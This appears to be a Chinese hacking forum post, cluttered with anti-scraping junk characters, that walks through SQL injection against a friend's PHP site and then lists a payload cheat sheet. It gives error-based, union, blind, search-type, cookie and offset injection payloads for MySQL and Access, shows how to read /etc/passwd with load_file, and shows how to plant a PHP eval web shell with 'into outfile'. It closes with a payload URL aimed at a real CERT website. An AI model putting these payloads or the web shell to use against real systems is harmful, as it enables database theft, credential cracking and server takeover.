我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
. ]: m& ]: g/ {3 n: E) f让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
2 A6 u( _* ^7 j" {% V3 Y- n. f我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
" I$ A3 H [$ Q# x6 C, y如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
E& l& G* J" a. |' `; q1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)6 u# }1 j( l+ Y9 A6 _, R1 a# _8 O4 ^
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:/ k+ H; E8 o& K6 a
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
( E; L( T; A0 ]1 x* `/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
) B$ @) J' {! \! l1 a P 0 y, `( i$ F0 l4 Q
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
5 \+ o0 l8 q8 f3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
& q% i" G# t' Z& i1 `0 H5 R6 N! z4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息( O# m5 z* }7 b6 X0 q" }
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。' t" G# c& P0 O8 L8 D- E$ \
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
3 X/ s3 n8 c* ^3 W) w& l B$ y2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
+ E% W2 a% N# r我就用的是第二个思路," t# V8 ?% t' @( [5 f
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- 5 `, v$ f4 i: Y4 e; e
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,4 R; ]+ ]" }0 H: c
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1-- C | U) j& E. A
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
- w' ^2 ]" X& S C( U, {7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
' V5 e2 x2 R' Z$ U" T是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
6 X; n* W5 W$ ?+ |& F. d8 x; X. a提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --; L" E, \; j- ~
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,7 c& c, F3 P8 L
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......, a% c6 i7 ?" }; e
下面是一些很普遍注入方式资料:
& _+ i3 o8 a/ s: ~# J! ] |/ U" o注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
; R2 d1 }( M. A! S5 [( f; P0 q拆半法. o6 M3 o. Q E& Q! a* O
######################################
+ C& e6 Q7 N3 h3 G; _and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
6 m0 y1 Q! Q, p6 I9 Q: c7 Tand exists (select * from admin)
: {* [6 e* H# K8 C' \3 W+ Q) t: n( g7 Iand exists(select id from admin)
/ ?$ V* [% f5 U( ^% o) V# Y7 fand exists(select id from admin where id=1)
n, R5 t9 J6 Z$ ^; f; Yand exists(select id from admin where id>1) 5 q( Z* r, I3 C4 M! b% U
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
( z6 Z3 E& B& f' ?; _and exists (select username from admin)7 U b& h8 i2 i0 o! ~
and exists (select password from admin)
; @. h m) t. mand exists (select id from admin where len(username)<10 and id=1)% }/ A. _% q2 T2 b# A! C
and exists (select id from admin where len(username)>5 and id=1)# d/ w: ]2 v/ ^7 J7 T
and exists (select id from admin where len(username)=6 and id=1)/ n$ {$ V3 J5 m& {
and exists (select id from admin where len(password)<10 and id=1)
' Z; g9 b' h! dand exists (select id from admin where len(password)>5 and id=1)0 ?3 D9 U9 M/ n o# }' i0 V
and exists (select id from admin where len(password)=7 and id=1); E Y1 I" N, f6 i0 X
and (select top 1 asc(mid(username,1,1)) from admin)=97
; J$ }" }" z, v: x% ]7 Q! j4 ~返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。2 R. O- T; C4 R" ^6 j1 ~
猜第二位把username,1,1改成username,2,1就可以了。/ W$ { y( c! N8 }& ?% Y2 j
猜密码把username改成password就OK了
9 B# z) [2 l6 M, ^, ]$ w1 ~##################################################
8 V! }6 w1 [8 ?6 f. y搜索型注入7 S! Z3 } H. C$ T/ @8 h
##################################
& [6 F1 ?0 W0 w%' and 1=1 and '%'='
. c0 y3 k2 e; j- R, G' Z%' and exists (select * from admin) and '%'='
$ g0 R6 A8 i2 ^%' and exists(select id from admin where id=1) and '%'='
/ u" d% N: M! p$ E7 F%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
/ n, B4 u# U/ n2 k%' and exists (select id from admin where len(password)=7 and id=1) and '%'='! N. f" U; {+ m$ [$ {* e( ^! s
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='% F( v0 X/ b7 P- t3 R
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'=', x6 T+ N# a3 r$ v) d7 G" A
对于MSSQL数据库,后面可以吧 and '%'='换成--
2 L: w- Q# e. L4 y6 ^还有一点搜索型注入也可以使用union语句。
2 O1 H% |. y' d3 k4 f& J6 b########################################################
+ Y) i" A. `7 Z* I F联合查询。: V2 q! A" y$ f5 n
#####################################$ Y, P' c! {* _ n; m
order by 10$ I4 D* W! j* W. |9 D# D" r
and 1=2 union select 1,2,3,4,5,6,7,8,9,10* A' Q6 L0 a, B! ?: J$ J
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin9 Y/ \& W' p$ H5 |/ J) A
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1: t( }0 G# Y& Y. g s. O3 n
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)9 s/ H) b9 `' D6 |
###################################- Z: K1 G- h. C: Z6 z/ ]
cookie注入
7 G4 m- E2 O2 S8 z###############################
! [9 p( N0 Y% Y, Z) \http://www.******.com/shownews.asp?id=127
% j8 S! {# ?) h7 [& z/ Yhttp://www.******.com/shownews.asp
% d5 x) b. I8 R4 c" E8 `* Halert(="id="+escape("127"));
' i, |) z. ^: [. N: ~1 halert(="id="+escape("127 and 1=1"));- ?+ K m; Y. @/ M5 I0 p/ {+ f
alert(="id="+escape("127 order by 10"));
0 i' [ J6 f/ ]" _alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));( G( L8 ~0 r1 J
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
: h3 Y# a5 m- B: }6 ^这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
( ~# S5 a, s1 W6 o0 O; X: h; J###################################
! U! {3 R. F* ~, B- g Z偏移注入
6 o( |3 C# {4 l$ P. r- I( ~+ t###########################################################2 g3 z- C: ]9 ]" i1 \& r) T
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin0 b- U' x$ o: K) w
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin. g! l, S" H& i: k' V2 ]- ]
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)7 n9 v% a2 W5 O/ ]$ w
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)* f9 K! \6 t: n6 F3 r, l
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)/ k- M* s8 L; Q9 w
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)% a# n. v+ Y4 M) i
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
& z0 b1 n2 F2 Q; `" [: }: g% na.id=d.id)
2 i7 V4 q0 A1 Z) B" P3 R/ Y6 x, q/ k! Dand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
2 ^% w* E4 ^6 r' u0 N( zand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) " ]& t# U6 h5 L
4 f7 g* K" D& U$ t o
============================================================================================================) U! y" q, G& p% E
1.判断版本
7 Z9 Z* \, t% `and ord(mid(version(),1,1))>51
& G! X. T$ Y6 w返回正常,说明大于4.0版本,支持ounion查询* h4 J' v, \! ~) j% l
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解$ }7 N% s: h1 o8 r% ?6 d) s* O- S
and 2=4 union select 1,2,3,4,5,6,7,8,9--
3 {$ h a" k9 w2 }9 `$ ?! ]" C3.查看数据库版本及当前用户,
% M! l2 e' a! W2 x; n- E' `& Fand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
' H/ f+ x% Z+ |% M7 \$ O数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,; J& C' K" [) k* n& @
4.判断有没有写权限
; z2 F9 E7 P. G1 `and (select count(*) from MySQL.user)>0-- * V4 G3 e! c" Q. C' R- Y
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,14 b, S7 ^$ }# w# d& W6 N7 t
用不了这个命令,就学习土耳其黑客手法,如下
- l: Q! S3 I; [% l! ^& t+ `6 cand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
: L7 L7 [, ^/ O1 O6.爆表,爆库
, k6 Y) O" O# `8 a- yand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--; H" y8 r3 n) |) Q9 C
7.爆列名,爆表
$ j7 [8 ?7 t( o/ E! J# d' gand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
; l _4 a: D% o2 v p8.查询字段数,直接用limit N,1去查询,直接N到报错为止。/ U, r% s! t1 `! A" ?; m$ C+ z
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--. {7 m w# \) ?) a' p* D! T/ \
9.爆字段内容0 x' r2 d. M* n' x: Y* v, a# {
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--* Y: |, h5 s& D6 T7 E
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |